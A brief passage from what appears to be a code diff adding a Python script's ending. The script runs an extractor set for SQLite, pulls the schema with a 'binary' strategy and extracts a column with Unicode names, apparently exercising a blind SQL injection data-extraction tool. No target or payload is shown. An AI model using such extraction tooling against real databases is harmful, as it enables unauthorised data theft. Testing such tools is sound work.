dbms=SQLite()) + + res = ext.extract_schema(strategy='binary') + print(res) + + res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ') + + + +if __name__ == '__main__': + main()